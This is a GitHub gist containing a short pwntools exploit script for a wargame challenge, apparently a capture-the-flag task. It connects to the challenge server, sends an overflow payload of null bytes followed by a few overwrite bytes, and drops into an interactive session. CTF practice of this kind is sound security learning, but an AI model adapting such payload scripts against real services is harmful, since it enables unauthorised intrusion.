Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
from pwn import *
r = remote('chall05-pwn01.wargame.whitehat.vn', 28103)
# r = process('./catflag')
# gdb.attach(r, )
r.sendline('\x00'*100+'\x46'*5+'\x47')
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.